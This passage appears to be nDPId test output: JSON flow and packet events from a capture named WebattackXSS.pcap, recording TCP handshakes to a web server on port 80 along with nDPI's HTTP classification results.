+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4224,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":2,"flow_last_seen":1499347474100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347474100,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4OgnZn4J4HH3oqAScSB9oAAAAgQFtAQCCAoD5KfuATrWeQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4225,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":3,"flow_last_seen":1499347474101,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347474101,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IdlAAD4Go\/+sEAABwKgKMuDoAFDgcfeiJ2Z+CoAQAOUcqAAAAQEICgE61nkD5Kfu"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347475384,"flow_last_seen":1499347475384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475384,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4235,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":1499347475384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347475384,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8yGtAAD4G\/WSsEAABwKgKMuD2AFCdWh\/RAAAAAKACchDnnAAAAgQFtAQCCAoBOte6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4236,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":2,"flow_last_seen":1499347475384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347475384,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4PYsYAVjnVof0qAScSAJpQAAAgQFtAQCCAoD5KkvATrXugEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4237,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":3,"flow_last_seen":1499347475385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347475385,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0yGxAAD4G\/WusEAABwKgKMuD2AFCdWh\/SLGAFZIAQAOWorAAAAQEICgE617oD5Kkv"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347341106,"flow_last_seen":1499347346712,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56158,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347341106,"flow_last_seen":1499347346712,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347342386,"flow_last_seen":1499347347713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56172,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347342386,"flow_last_seen":1499347347713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347343672,"flow_last_seen":1499347348713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56186,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347343672,"flow_last_seen":1499347348713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56186,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347346211,"flow_last_seen":1499347351713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56212,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347346211,"flow_last_seen":1499347351713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347347483,"flow_last_seen":1499347352714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56226,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347347483,"flow_last_seen":1499347352714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56226,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347348776,"flow_last_seen":1499347354714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56240,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4245,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347348776,"flow_last_seen":1499347354714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347475742,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56240,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347476667,"flow_last_seen":1499347476667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347476667,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4249,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":1499347476667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347476667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86aJAAD4G3C2sEAABwKgKMuEEAFDYCDFYAAAAAKACchCaGQAAAgQFtAQCCAoBOtj6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4250,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":2,"flow_last_seen":1499347476667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347476667,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4QTgdpFp2AgxWaAScSB6wwAAAgQFtAQCCAoD5KpwATrY+gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4251,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":3,"flow_last_seen":1499347476667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347476667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06aNAAD4G3DSsEAABwKgKMuEEAFDYCDFZ4HaRaoAQAOUZywAAAQEICgE62PoD5Kpw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347479172,"flow_last_seen":1499347479172,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347479172,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":1499347479172,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347479172,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iKNAAD4GPS2sEAABwKgKMuEeAFCusFPOAAAAAKACchCebgAAAgQFtAQCCAoBOtttAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4267,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":2,"flow_last_seen":1499347479172,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347479172,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4R7s2gFNrrBTz6AScSAAXwAAAgQFtAQCCAoD5KziATrbbQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4268,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":3,"flow_last_seen":1499347479173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347479173,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iKRAAD4GPTSsEAABwKgKMuEeAFCusFPP7NoBToAQAOWfZgAAAQEICgE6220D5Kzi"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347480438,"flow_last_seen":1499347480438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347480438,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57644,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":1499347480438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347480438,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UJlAAD4GdTesEAABwKgKMuEsAFBzZ4wwAAAAAKACchCgCwAAAgQFtAQCCAoBOtypAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4279,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":2,"flow_last_seen":1499347480438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347480438,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4SwTIR0Qc2eMMaAScSC+tQAAAgQFtAQCCAoD5K4fATrcqQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":3,"flow_last_seen":1499347480439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347480439,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UJpAAD4GdT6sEAABwKgKMuEsAFBzZ4wxEyEdEYAQAOVdvQAAAQEICgE63KkD5K4f"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4290,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347481724,"flow_last_seen":1499347481724,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347481724,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57658,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4290,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":1499347481724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347481724,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8fSpAAD4GSKasEAABwKgKMuE6AFDTgqDBAAAAAKACchAqDwAAAgQFtAQCCAoBOt3rAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":2,"flow_last_seen":1499347481724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347481724,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4TowvlKP04KgwqAScSD0WwAAAgQFtAQCCAoD5K9gATrd6wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":3,"flow_last_seen":1499347481725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347481725,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0fStAAD4GSK2sEAABwKgKMuE6AFDTgqDCML5SkIAQAOWTYwAAAQEICgE63esD5K9g"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347484263,"flow_last_seen":1499347484263,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347484263,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57684,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":1,"flow_last_seen":1499347484263,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347484263,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UOVAAD4GdOusEAABwKgKMuFUAFABZrCAAAAAAKACchDp2AAAAgQFtAQCCAoBOuBlAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":2,"flow_last_seen":1499347484263,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347484263,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4VQEZrkRAWawgaAScSB3gAAAAgQFtAQCCAoD5LHbATrgZQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4310,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":3,"flow_last_seen":1499347484264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347484264,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UOZAAD4GdPKsEAABwKgKMuFUAFABZrCBBGa5EoAQAOUWhwAAAQEICgE64GYD5LHb"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347485533,"flow_last_seen":1499347485533,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485533,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":1,"flow_last_seen":1499347485533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347485533,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jaZAAD4GOCqsEAABwKgKMuFiAFALNGwFAAAAAKACchAjOgAAAgQFtAQCCAoBOuGjAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4321,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":2,"flow_last_seen":1499347485533,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347485533,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4WJ5n4cfCzRsBqAScSBsXQAAAgQFtAQCCAoD5LMYATrhowEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4322,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":305,"flow_packet_id":3,"flow_last_seen":1499347485534,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347485534,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jadAAD4GODGsEAABwKgKMuFiAFALNGwGeZ+HIIAQAOULZQAAAQEICgE64aMD5LMY"} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347291442,"flow_last_seen":1499347358996,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232674,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347351299,"flow_last_seen":1499347356715,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56266,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347351299,"flow_last_seen":1499347356715,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347352698,"flow_last_seen":1499347357715,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347485746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56280,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 